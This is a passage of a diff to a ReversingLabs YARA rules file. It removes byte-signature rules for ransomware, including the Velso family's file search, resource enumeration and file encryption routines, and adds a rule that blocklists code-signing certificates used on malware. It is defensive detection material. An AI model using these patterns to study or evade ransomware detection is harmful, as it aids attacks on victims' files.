-            8B 45 ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ??
-            ?? 0F 84 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85
-            ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ??
-            8D 95 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 8B
-            45 ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8
-        }
-		$file_extensions_4 = {
-            0F 84 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ??
-            ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8D
-            95 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 8B 45
-            ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 0F
-            84 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ??
-            ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8D 95
-            ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 8B 45 ??
-            E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 0F 84
-        }
-		$file_extensions_5 = {
-            ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ??
-            ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8D 95 ??
-            ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 8B 45 ?? E8
-            ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 0F 84 ??
-            ?? ?? ?? 8D 95 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ??
-            BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8D 95 ?? ??
-            ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 8B 45 ?? E8 ??
-            ?? ?? ?? 8B 85 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 0F 84
-            }
-		$parse_server_commands = {
-            83 F9 ?? 0F 84 E0 00 00 00 50 53 56 57 89 C3 89 D6 89 CF 31 D2 8A 06 8A 56 ?? 3C ?? 74 25 3C ?? 74 3E 3C ?? 74 51 3C ??
-            74 5C 3C ?? 74 76 3C ?? 0F 84 84 00 00 00 3C ?? 0F 84 8B 00 00 00 E9 97 00 00 00 83 F9 ?? 89 D8 7F 0A E8 ?? ?? ?? ?? E9
-            91 00 00 00 89 CA E8 ?? ?? ?? ?? E9 85 00 00 00 83 F9 ?? 89 D8 7F 07 E8 ?? ?? ?? ?? EB 77 89 CA E8 ?? ?? ?? ?? EB 6E 89
-            D8 83 C3 ?? E8 ?? ?? ?? ?? 4F 7F F3 EB 5F 55 89 D5 8B 54 2E ?? 89 D8 03 5C 2E ?? 8B 4C 2E ?? 8B 12 E8 62 FF FF FF 4F 7F
-            E8 5D EB 41 55 89 D5 89 D8 03 5C 2E ?? 89 F2 E8 ?? ?? ?? ?? 4F 7F F0 5D EB 2B 89 D8 83 C3 ?? E8 ?? ?? ?? ?? 4F 7F F3 EB
-            1C 89 D8 89 F2 83 C3 ?? E8 ?? ?? ?? ?? 4F 7F F1 EB 0B 5F 5E 5B 58 B0 ?? E9 ?? ?? ?? ?? 5F 5E 5B 58 C3 8B C0 B9 ?? ?? ??
-            ?? E9 0A FF FF FF C3
-        }
-
 	condition:
-		uint16( 0 ) == 0x5A4D and ( ( $file_extensions_1 and $file_extensions_2 and $file_extensions_3 and $file_extensions_4 and $file_extensions_5 ) and $parse_server_commands )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "GIN-Konsalt" and pe.signatures [ i ] . serial == "73:86:63:f2:c9:e4:ad:b3:ad:53:06:aa:5e:7c:c5:48" and 1498435200 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Win32_Ransomware_Velso : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_4280F2C8Ce1D98E5F8Da7Ecb005Eeae5 : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects Velso ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "72c7baaa-4f83-54c5-ba71-2b45e5eeefd2"
-		date = "2020-07-15"
-		modified = "2020-07-15"
+		id = "559dc522-bc23-5716-b8ad-9e9df102936b"
+		date = "2023-11-08"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/ransomware/Win32.Ransomware.Velso.yara#L1-L230"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "602be848a26106a1bd46cfc515578f0628687e6cb352e609a274220a61bcb620"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L16636-L16652"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "4cc8f00a9704f595f3e48375942a19cd6f8d6c0e53afc932a61f5a4326be4bcb"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "Velso"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$find_files_p1 = {
-            55 89 E5 81 EC ?? ?? ?? ?? 8D 45 ?? 89 A5 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ??
-            C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 8D 85
-            ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? C7 04 24 ?? ?? ?? ?? 8B 4D ?? C7 85 ?? ?? ?? ??
-            ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 EC ?? 85 C0 75 ?? C6 85 ?? ?? ?? ?? ?? 8D 85 ?? ?? ??
-            ?? 89 04 24 E8 ?? ?? ?? ?? 0F B6 85 ?? ?? ?? ?? C9 C3 C7 04 24 ?? ?? ?? ?? 8B 4D ??
-            C7 85 ?? ?? ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 EC ?? 85 C0 74 ?? C7 04 24 ?? ?? ??
-            ?? 8B 4D ?? E8 ?? ?? ?? ?? 83 EC ?? 85 C0 74 ?? C7 04 24 ?? ?? ?? ?? 8B 4D ?? E8 ??
-            ?? ?? ?? 83 EC ?? 85 C0 74 ?? C7 04 24 ?? ?? ?? ?? 8B 4D ?? E8 ?? ?? ?? ?? 83 EC ??
-            85 C0 74 ?? C7 04 24 ?? ?? ?? ?? 8B 4D ?? E8 ?? ?? ?? ?? 83 EC ?? 85 C0 0F 84 ?? ??
-            ?? ?? C7 04 24 ?? ?? ?? ?? 8B 4D ?? E8 ?? ?? ?? ?? 83 EC ?? 85 C0 0F 84 ?? ?? ?? ??
-            C7 04 24 ?? ?? ?? ?? 8B 4D ?? E8 ?? ?? ?? ?? 83 EC ?? 85 C0 0F 84 ?? ?? ?? ?? C7 04
-            24 ?? ?? ?? ?? 8B 4D ?? E8 ?? ?? ?? ?? 85 C0 51 0F 84 ?? ?? ?? ?? C7 04 24 ?? ?? ??
-            ?? 8B 4D ?? E8 ?? ?? ?? ?? 85 C0 52 0F 84 ?? ?? ?? ?? C7 04 24 ?? ?? ?? ?? 8B 4D ??
-            E8 ?? ?? ?? ?? 85 C0 51 0F 84 ?? ?? ?? ?? C7 04 24 ?? ?? ?? ?? 8B 4D ?? E8 ?? ?? ??
-            ?? 85 C0 52 0F 84 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 8B 45 ?? 89 44 24 ?? 8D 85 ??
-            ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 89 04 24 8B 4D ?? C7 85 ?? ?? ??
-            ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 51 8B 85 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 39 D0 74 ?? 89
-            04 24 E8 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 8B 45 ?? 89 44 24 ?? 8D 85 ?? ?? ?? ??
-            89 04 24 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 89 44 24
-        }
-		$find_files_p2 = {
-            8B 85 ?? ?? ?? ?? 89 04 24 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 52 52 8D 95
-            ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 39 D0 74 ?? 89 04 24 E8 ?? ?? ?? ??
-            EB ?? 8D 85 ?? ?? ?? ?? 89 44 24 ?? 8B 85 ?? ?? ?? ?? 89 04 24 C7 85 ?? ?? ?? ?? ??
-            ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 52 52 0F 84 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? C7 44 24 ??
-            ?? ?? ?? ?? 89 04 24 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 51 51 74 ??
-            8D 85 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? 85 C0 52 52 74 ??
-            F6 85 ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 8B 4D ?? 89 85 ?? ?? ?? ??
-            8B 45 ?? 8B 51 ?? 8D 8D ?? ?? ?? ?? 8B 00 01 C2 89 04 24 89 54 24 ?? C7 85 ?? ?? ??
-            ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 51 51 89 44 24 ?? 8B 45 ?? 89 44 24
-            ?? 8D 85 ?? ?? ?? ?? 89 04 24 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ??
-            ?? ?? ?? 89 44 24 ?? 8B 45 ?? 89 44 24 ?? 8D 85 ?? ?? ?? ?? 89 04 24 C7 85 ?? ?? ??
-            ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 39 D0 74 ?? 89 04
-            24 E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 39 D0 0F 84 ?? ?? ?? ?? 89 04
-            24 E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 89 44 24 ?? 8B 45 ?? 89 44 24 ??
-            8D 85 ?? ?? ?? ?? 89 04 24 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 45 ?? 89
-            44 24 ?? 8D 85 ?? ?? ?? ?? 89 04 24 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? EB
-            ?? 83 C5 ?? 83 BD ?? ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 0F 87 ?? ?? ??
-            ?? 8B 85 ?? ?? ?? ?? FF 24 85 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 89 04 24 E8
-        }
-		$enum_resources_p1 = {
-            55 89 E5 81 EC ?? ?? ?? ?? 8D 45 ?? 89 65 ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ??
-            ?? C7 45 ?? ?? ?? ?? ?? 89 45 ?? 8D 45 ?? 89 04 24 E8 ?? ?? ?? ?? 8D 45 ?? C7 45 ??
-            ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 89 44 24 ?? 8B 45 ?? C7 44 24 ?? ?? ?? ?? ?? C7 44
-            24 ?? ?? ?? ?? ?? C7 04 24 ?? ?? ?? ?? 89 44 24 ?? C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ??
-            ?? 83 EC ?? 85 C0 74 ?? C7 45 ?? ?? ?? ?? ?? 8D 45 ?? 89 04 24 E8 ?? ?? ?? ?? 8B 45
-            ?? C9 C2 ?? ?? 8B 45 ?? C7 04 24 ?? ?? ?? ?? 89 44 24 ?? C7 45 ?? ?? ?? ?? ?? E8 ??
-            ?? ?? ?? 83 EC ?? 85 C0 89 85 ?? ?? ?? ?? 74 ?? 90 8D B4 26 ?? ?? ?? ?? 8B 45 ?? C7
-            44 24 ?? ?? ?? ?? ?? 89 44 24 ?? 8B 85 ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? 8D 55 ??
-            89 54 24 ?? 8B 85 ?? ?? ?? ?? 8D 55 ?? 89 54 24 ?? 89 44 24 ?? 8B 45 ?? 89 04 24 C7
-            45 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 EC ?? 85 C0 74 ?? 8B 85 ?? ?? ?? ?? 89 04 24 C7
-            45 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 45 ?? 83 EC ?? 89 04 24 E8 ?? ?? ?? ?? 83 EC ??
-            85 C0 0F 94 C0 0F B6 C0 89 45 ?? E9 ?? ?? ?? ?? 8B 45 ?? 85 C0 0F 84 ?? ?? ?? ?? 8B
-        }
-		$enum_resources_p2 = {
-            85 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 89 45 ?? EB ?? 8B 45 ?? 8B 40 ?? 89 85
-            ?? ?? ?? ?? 83 E0 ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? 83 85 ?? ?? ?? ?? ?? 83 45 ?? ?? 8B
-            85 ?? ?? ?? ?? 39 45 ?? 0F 86 ?? ?? ?? ?? 8B 45 ?? F6 40 ?? ?? 74 ?? 8D 45 ?? 8B 4D
-            ?? 89 45 ?? 8B 45 ?? 8B 51 ?? 8D 4D ?? 8B 00 01 C2 89 04 24 89 54 24 ?? C7 45 ?? ??
-            ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 ?? 83 EC ?? 89 44 24 ?? 8B 45 ?? 89 44 24 ?? 8B 45 ??
-            89 04 24 C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 45 ?? 8D 55 ?? 83 EC ?? 39 D0 0F 84
-            ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 8D B4 26 ?? ?? ?? ?? 8D 45 ?? 8B
-            4D ?? 89 45 ?? 8B 45 ?? 8B 51 ?? 8D 4D ?? 8B 00 01 C2 89 04 24 89 54 24 ?? C7 45 ??
-            ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 45 ?? 83 EC ?? 8B 40 ?? 89 C2 89 85 ?? ?? ?? ?? 8D 45
-            ?? 85 D2 89 45 ?? B8 ?? ?? ?? ?? 74 ?? 89 14 24 E8 ?? ?? ?? ?? 03 85 ?? ?? ?? ?? 89
-            44 24 ?? 8B 85 ?? ?? ?? ?? 8D 4D ?? 89 04 24 C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D
-            45 ?? 83 EC ?? 89 44 24 ?? 8B 45 ?? 89 44 24 ?? 8D 45 ?? 89 04 24 C7 45 ?? ?? ?? ??
-            ?? E8 ?? ?? ?? ?? 8B 45 ?? 8D 55 ?? 39 D0 74 ?? 89 04 24 E8 ?? ?? ?? ?? 8B 45 ?? 8D
-            55 ?? 39 D0 0F 84 ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? E9
-        }
-		$encrypt_files_p1 = {
-            55 89 E5 81 EC ?? ?? ?? ?? 8D 45 ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ??
-            ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 89 A5 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 8D 85
-            ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? ??
-            C6 45 ?? ?? 8D 8D ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C6
-            45 ?? ?? C7 45 ?? ?? ?? ?? ?? 03 48 ?? 89 85 ?? ?? ?? ?? A1 ?? ?? ?? ?? C7 45 ?? ??
-            ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 89 01 C7 04 24 ?? ?? ?? ?? C7 85
-            ?? ?? ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 83 EC ?? C7 85 ?? ?? ?? ??
-            ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? E8 ?? ?? ??
-            ?? 8D 85 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 89 04 24 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? E8 ??
-            ?? ?? ?? 8D 85 ?? ?? ?? ?? 8B 4D ?? 83 EC ?? 89 85 ?? ?? ?? ?? 8B 45 ?? 8B 51 ?? 8D
-            8D ?? ?? ?? ?? 8B 00 01 C2 89 04 24 89 54 24 ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? E8 ??
-            ?? ?? ?? B8 ?? ?? ?? ?? 2B 85 ?? ?? ?? ?? 83 EC ?? 83 F8 ?? 0F 86 ?? ?? ?? ?? 8D 8D
-            ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 04 24 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ??
-            ?? E8 ?? ?? ?? ?? 83 EC ?? 8D 8D ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 8B 85 ?? ?? ??
-            ?? 89 04 24 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 EC ?? 85 C0 8D 8D ?? ??
-            ?? ?? 8B 85 ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 03 48 ?? C7 04 24 ?? ?? ?? ?? C7 85 ?? ??
-            ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 83 EC ?? 39 D0
-            74 ?? 89 04 24 E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ??
-            ?? ?? ?? ?? 89 04 24 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ??
-            C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? 8B 45 ?? 8B
-        }
-		$encrypt_files_p2 = {
-            40 ?? 89 44 24 ?? 8B 45 ?? 8B 00 89 44 24 ?? 8D 85 ?? ?? ?? ?? 89 04 24 E8 ?? ?? ??
-            ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C7 85
-            ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ??
-            C7 85 ?? ?? ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ??
-            ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? E8 ?? ?? ??
-            ?? A1 ?? ?? ?? ?? 8B 15 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 8B 40 ?? 89 94 05 ?? ?? ?? ??
-            C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ??
-            ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? C9 C3 03 48 ?? 8B 41 ?? 83 C8 ?? 89 04 24 C7 85 ??
-            ?? ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8D 8D ?? ?? ??
-            ?? 03 48 ?? 8B 41 ?? 83 C8 ?? 89 04 24 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ??
-            83 EC ?? E9 ?? ?? ?? ?? C7 04 24 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? E8 ?? ??
-            ?? ?? 83 C5 ?? 83 BD ?? ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 77 ?? 8B 85
-            ?? ?? ?? ?? FF 24 85 ?? ?? ?? ?? 0F 0B 8B 85 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 39 D0 74
-            ?? 89 04 24 E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? E8 ?? ??
-            ?? ?? 8B 85 ?? ?? ?? ?? 89 04 24 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D
-            ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 8B 15 ?? ??
-            ?? ?? 8B 40 ?? 89 94 05 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C7 85
-        }
-		$encrypt_files_p3 = {
-            C7 85 ?? ?? ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 89 04 24 C7 85 ?? ??
-            ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? E8
-            ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? A1 ?? ??
-            ?? ?? 8B 15 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 8B 40 ?? 89 94 05 ?? ?? ?? ?? C7 85 ?? ??
-            ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 89
-            04 24 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D B4 26 ?? ?? ?? ?? 55 89 E5 81
-            EC ?? ?? ?? ?? 8D 45 ?? 89 65 ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ??
-            ?? ?? ?? ?? 89 45 ?? 8D 45 ?? 89 04 24 E8 ?? ?? ?? ?? 8D 45 ?? 8B 4D ?? 89 45 ?? 8B
-            45 ?? 8B 51 ?? 8D 4D ?? 8B 00 01 C2 89 04 24 89 54 24 ?? C7 45 ?? ?? ?? ?? ?? E8 ??
-            ?? ?? ?? 8D 45 ?? 83 EC ?? 89 44 24 ?? 8D 45 ?? 89 04 24 C7 45 ?? ?? ?? ?? ?? E8 ??
-            ?? ?? ?? 8D 4D ?? C7 04 24 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 45 ??
-            8B 45 ?? 8D 55 ?? 83 EC ?? 39 D0 74 ?? 89 04 24 E8 ?? ?? ?? ?? 8B 45 ?? 8D 55 ?? 39
-        }
-		$encrypt_files_p4 = {
-            D0 74 ?? 89 04 24 E8 ?? ?? ?? ?? 8B 55 ?? 85 D2 75 ?? C6 45 ?? ?? 8D 45 ?? 89 04 24
-            E8 ?? ?? ?? ?? 0F B6 45 ?? C9 C3 8D 45 ?? 8B 4D ?? 89 45 ?? 8B 45 ?? 8B 51 ?? 8D 4D
-            ?? 8B 00 01 C2 89 04 24 89 54 24 ?? C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 ?? 83
-            EC ?? 89 44 24 ?? 8D 45 ?? 89 04 24 C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 4D ?? C7
-            04 24 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 45 ?? 8B 45 ?? 8D 55 ?? 83
-            EC ?? 39 D0 74 ?? 89 04 24 E8 ?? ?? ?? ?? 8B 45 ?? 8D 4D ?? 39 C8 74 ?? 89 04 24 E8
-            ?? ?? ?? ?? 8B 45 ?? 85 C0 0F 84 ?? ?? ?? ?? 8D 45 ?? 8B 4D ?? 89 45 ?? 8B 45 ?? 8B
-            51 ?? 8D 4D ?? 8B 00 01 C2 89 04 24 89 54 24 ?? C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ?? ??
-            8D 45 ?? 83 EC ?? 89 44 24 ?? 8D 45 ?? 89 04 24 C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ?? ??
-            8D 4D ?? C7 04 24 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 45 ?? 8B 45 ??
-            8D 55 ?? 83 EC ?? 39 D0 74 ?? 89 04 24 E8 ?? ?? ?? ?? 8B 45 ?? 8D 55 ?? 39 D0 74 ??
-            89 04 24 E8 ?? ?? ?? ?? 8B 45 ?? 85 C0 0F 84 ?? ?? ?? ?? 8D 45 ?? 8B 4D ?? 89 45
-        }
-		$encrypt_files_p5 = {
-            8B 45 ?? 8B 51 ?? 8D 4D ?? 8B 00 01 C2 89 04 24 89 54 24 ?? C7 45 ?? ?? ?? ?? ?? E8
-            ?? ?? ?? ?? 8D 45 ?? 83 EC ?? 89 44 24 ?? 8D 45 ?? 89 04 24 C7 45 ?? ?? ?? ?? ?? E8
-            ?? ?? ?? ?? 8D 4D ?? C7 04 24 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 45
-            ?? 8B 45 ?? 8D 55 ?? 83 EC ?? 39 D0 74 ?? 89 04 24 E8 ?? ?? ?? ?? 8B 45 ?? 8D 55 ??
